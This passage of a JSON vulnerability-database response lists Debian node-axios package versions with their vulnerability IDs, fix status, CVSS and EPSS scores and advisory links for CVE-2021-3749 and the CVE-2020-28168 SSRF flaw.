8z3n-sqgd"},{"vulnerability":"VCID-gtc3-vrcs-yfb9"},{"vulnerability":"VCID-nmzm-1341-jfgt"},{"vulnerability":"VCID-p78g-vmhn-yyck"},{"vulnerability":"VCID-tdwz-gg36-mkgs"},{"vulnerability":"VCID-uuzj-ta8k-c3fn"},{"vulnerability":"VCID-wbq8-z3qg-bfbt"},{"vulnerability":"VCID-z6xx-7p9v-gqc6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.15.0-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/1077457?format=json","purl":"pkg:deb/debian/node-axios@1.15.2-1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.15.2-1%3Fdistro=trixie"}],"aliases":["CVE-2021-3749","GHSA-cph5-m8f7-6c5x"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-n89f-3nkb-ebg3"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/36275?format=json","vulnerability_id":"VCID-xtpz-6f5t-t3ev","summary":"Axios vulnerable to Server-Side Request Forgery\nAxios NPM package 0.21.0 contains a Server-Side Request Forgery (SSRF) vulnerability where an attacker is able to bypass a proxy by providing a URL that responds with a redirect to a restricted host or IP address.","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-28168.json","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-28168.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2020-28168","reference_id":"","reference_type":"","scores":[{"value":"0.00446","scoring_system":"epss","scoring_elements":"0.63467","published_at":"2026-05-05T12:55:00Z"},{"value":"0.00446","scoring_system":"epss","scoring_elements":"0.63474","published_at":"2026-04-12T12:55:00Z"},{"value":"0.00446","scoring_system":"epss","scoring_elements":"0.63498","published_at":"2026-04-26T12:55:00Z"},{"value":"0.00446","scoring_system":"epss","scoring_elements":"0.63485","published_at":"2026-04-24T12:55:00Z"},{"value":"0.00446","scoring_system":"epss","scoring_elements":"0.63466","published_at":"2026-04-21T12:55:00Z"},{"value":"0.00446","scoring_system":"epss","scoring_elements":"0.6348","published_at":"2026-04-18T12:55:00Z"},{"value":"0.00446","scoring_system":"epss","scoring_elements":"0.63473","published_at":"2026-04-16T12:55:00Z"},{"value":"0.00446","scoring_system":"epss","scoring_elements":"0.6335","published_at":"2026-04-01T12:55:00Z"},{"value":"0.00446","scoring_system":"epss","scoring_elements":"0.6341","published_at":"2026-04-02T12:55:00Z"},{"value":"0.00446","scoring_system":"epss","scoring_elements":"0.63437","published_at":"2026-04-04T12:55:00Z"},{"value":"0.00446","scoring_system":"epss","scoring_elements":"0.63403","published_at":"2026-04-07T12:55:00Z"},{"value":"0.00446","scoring_system":"epss","scoring_elements":"0.63455","published_at":"2026-04-08T12:55:00Z"},{"value":"0.00446","scoring_system":"epss","scoring_elements":"0.63472","published_at":"2026-04-09T12:55:00Z"},{"value":"0.00446","scoring_system":"epss","scoring_elements":"0.6349","published_at":"2026-04-11T12:55:00Z"},{"value":"0.00446","scoring_system":"epss","scoring_elements":"0.63439","published_at":"2026-04-13T12:55:00Z"},{"value":"0.00446","scoring_system":"epss","scoring_elements":"0.63494","published_at":"2026-04-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2020-28168"},{"reference_url":"https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf"},{"reference_url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28168","reference_id":"","reference_type":"","scores":[],"url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28168"},{"reference_url":"https://github.com/axios/axios/commit/c7329fefc890050edd51e40e469a154d0117fc55","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/axios/axios/commit/c7329fefc890050edd51e40e469a154d0117fc55"},{"reference_url":"https://github.com/axios/axios/issues/3369","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/axios/axios/issues/3369"},{"reference_url":"https://lists.apache.org/thread.html/r25d53acd06f29244b8a103781b0339c5e7efee9099a4d52f0c230e4a@%3Ccommits.druid.apache.org%3E","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://lists.apache.org/thread.html/r25d53acd06f29244b8a103781b0339c5e7efee9099a4d52f0c230e4a@%3Ccommits.druid.apache.org%3E"},{"reference_url":"https://lists.apache.org/thread.html/r954d80fd18e9dafef6e813963eb7e08c228151c2b6268ecd63b35d1f@%3Ccommits.druid.apache.org%3E","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://lists.apache.org/thread.html/r954d80fd18e9dafef6e813963eb7e08c228151c2b6268ecd63b35d1f@%3Ccommits.druid.apache.org%3E"},{"reference_url":"https://lists.apache.org/thread.html/rdfd2901b8b697a3f6e2c9c6ecc688fd90d7f881937affb5144d61d6e@%3Ccommits.druid.apache.org%3E","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://lists.apache.org/thread.html/rdfd2901b8b697a3f6e2c9c6ecc688fd90d7f881937affb5144d61d6e@%3Ccommits.druid.apache.org%3E"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2020-28168","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2020-28168"},{"reference_url":"https://snyk.io/vuln/SNYK-JS-AXIOS-1038255","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://snyk.io/vuln/SNYK-JS-AXIOS-1038255"},{"reference_url":"https://www.npmjs.com/advisories/1594","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.npmjs.com/advisories/1594"},{"reference_url":"https://www.npmjs.com/package/axios","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.npmjs.com/package/axios"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=1896130","reference_id":"1896130","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=1896130"},{"reference_url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=975305","reference_id":"975305","reference_type":"","scores":[],"url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=975305"},{"reference_url":"https://github.com/advisories/GHSA-4w2v-q235-vp99","reference_id":"GHSA-4w2v-q235-vp99","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-4w2v-q235-vp99"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/932084?format=json","purl":"pkg:deb/debian/node-axios@0.21.1%2Bdfsg-1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@0.21.1%252Bdfsg-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/932081?format=json","purl":"pkg:deb/debian/node-axios@0.21.1%2Bdfsg-1%2Bdeb11u1?distro=trixie","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1vkx-cwua-rqe4"},{"vulnerability":"VCID-671j-k4zn-xbgk"},{"vulnerability":"VCID-7rdk-mw2k-eqdx"},{"vulnerability":"VCID-8352-4tud-y3f4"},{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-cj5w-7hbe-wqex"},{"vulnerability":"VCID-drqq-9mkv-qkbx"},{"vulnerability":"VCID-e86t-8z3n-sqgd"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-gtc3-vrcs-yfb9"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-kgnf-z6ca-tqgp"},{"vulnerability":"VCID-nmzm-1341-jfgt"},{"vulnerability":"VCID-p78g-vmhn-yyck"},{"vulnerability":"VCID-tdwz-gg36-mkgs"},{"vulnerability":"VCID-uuzj-ta8k-c3fn"},{"vulnerability":"VCID-wbq8-z3qg-bfbt"},{"vulnerability":"VCID-x41s-g5mh-pkdq"},{"vulnerability":"VCID-z6xx-7p9v-gqc6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@0.21.1%252Bdfsg-1%252Bdeb11u1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/932079?format=json","purl":"pkg:deb/debian/node-axios@1.2.1%2Bdfsg-1%2Bdeb12u1?distro=trixie","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-671j-k4zn-xbgk"},{"vulnerability":"VCID-8352-4tud-y3f4"},{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-cj5w-7hbe-wqex"},{"vulnerability":"VCID-drqq-9mkv-qkbx"},{"vulnerability":"VCID-e86t-8z3n-sqgd"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-gtc3-vrcs-yfb9"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-kgnf-z6ca-tqgp"},{"vulnerability":"VCID-nmzm-1341-jfgt"},{"vulnerability":"VCID-p78g-vmhn-yyck"},{"vulnerability":"VCID-tdwz-gg36-mkgs"},{"vulnerability":"VCID-uuzj-ta8k-c3fn"},{"vulnerability":"VCID-wbq8-z3qg-bfbt"},{"vulnerability":"VCID-x41s-g5mh-pkdq"},{"vulnerability":"VCID-z6xx-7p9v-gqc6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.2.1%252Bdfsg-1%252Bdeb12u1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/932083?format=json","purl":"pkg:deb/debian/node-axios@1.8.4%2Bdfsg-1?distro=trixie","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-671j-k4zn-xbgk"},{"vulnerability":"VCID-8352-4tud-y3f4"},{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-cj5w-7hbe-wqex"},{"vulnerability":"VCID-drqq-9mkv-qkbx"},{"vulnerability":"VCID-e86t-8z3n-sqgd"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-gtc3-vrcs-yfb9"},{"vulnerability":"VCID-kgnf-z6ca-tqgp"},{"vulnerability":"VCID-nmzm-1341-jfgt"},{"vulnerability":"VCID-p78g-vmhn-yyck"},{"vulnerability":"VCID-tdwz-gg36-mkgs"},{"vulnerability":"VCID-uuzj-ta8k-c3fn"},{"vulnerability":"VCID-wbq8-z3qg-bfbt"},{"vulnerability":"VCID-x41s-g5mh-pkdq"},{"vulnerability":"VCID-z6xx-7p9v-gqc6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.8.4%252Bdfsg-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/932082?format=json","purl":"pkg:deb/debian/node-axios@1.14.0%2Bdfsg-1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.14.0%252Bdfsg-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/1062504?format=json","purl":"pkg:deb/debian/node-axios@1.15.0-1?distro=trixie","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-671j-k4zn-xbgk"},{"vulnerability":"VCID-8352-4tud-y3f4"},{"vulnerability":"VCID-cj5w-7hbe-wqex"},{"vulnerability":"VCID-drqq-9mkv-qkbx"},{"vulnerability":"VCID-e86t-8z3n-sqgd"},{"vulnerability":"VCID-gtc3-vrcs-yfb9"},{"vulnerability":"VCID-nmzm-1341-jfgt"},{"vulnerability":"VCID-p78g-vmhn-yyck"},{"vulnerability":"VCID-tdwz-gg36-mkgs"},{"vulnerability":"VCID-uuzj-ta8k-c3fn"},{"vulnerability":"VCID-wbq8-z3qg-bfbt"},{"vulnerability":"VCID-z6xx-7p9v-gqc6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.15.0-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/1077457?format=json","purl":"pkg:deb/debian/node-axios@1.15.2-1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.15.2-1%3Fdistro=trixie"}],"aliases":["CVE-2020-28168","GHSA-4w2v-q235-vp99"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-xtpz-6f5t-t3ev"}],"risk_score":"4.5","resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.2.1%252Bdfsg-1%252Bdeb12u1%3Fdistro=trixie"}